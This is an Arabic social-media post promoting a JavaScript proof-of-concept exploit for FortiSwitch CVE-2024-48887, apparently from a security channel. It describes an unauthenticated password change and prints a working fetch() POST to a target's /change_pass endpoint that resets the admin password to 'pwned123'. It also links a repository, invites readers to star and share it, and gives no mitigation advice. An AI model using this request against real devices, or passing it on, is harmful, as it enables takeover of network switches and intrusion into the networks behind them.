
مقتطف JavaScript خفيف يوضح كيف يمكن تشغيل تغييرات كلمة المرور غير المصرح بها على نقاط نهاية واجهة المستخدم الرسومية (GUI) لجهاز FortiSwitch من Fortinet.
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨
🔥 لقد أصدرت للتو مقتطف JavaScript خفيف الوزن يعرض كيف يمكن تشغيل تغييرات كلمة المرور غير المصرح بها على نقاط نهاية واجهة المستخدم الرسومية لـ Fortinet FortiSwitch الضعيفة.
🛠️ حول الثغرة: يمكن للمهاجم إنشاء طلب fetch() بسيط للتلاعب بإعدادات كلمة المرور دون أي مصادقة، مستهدفًا مباشرةً نقاط نهاية /change_pass المختلفة.
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 التأثير: السيطرة الكاملة على المحول، إمكانية الحركة الجانبية، واختراق الشبكة.
📁 المستودع: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ قم بتعليم المستودع بنجمة وشاركه مع زملائك في مجال أمن المعلومات!
📢 تابع التحليل الكامل والتنبيهات الفورية عبر @cybersecplayground
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground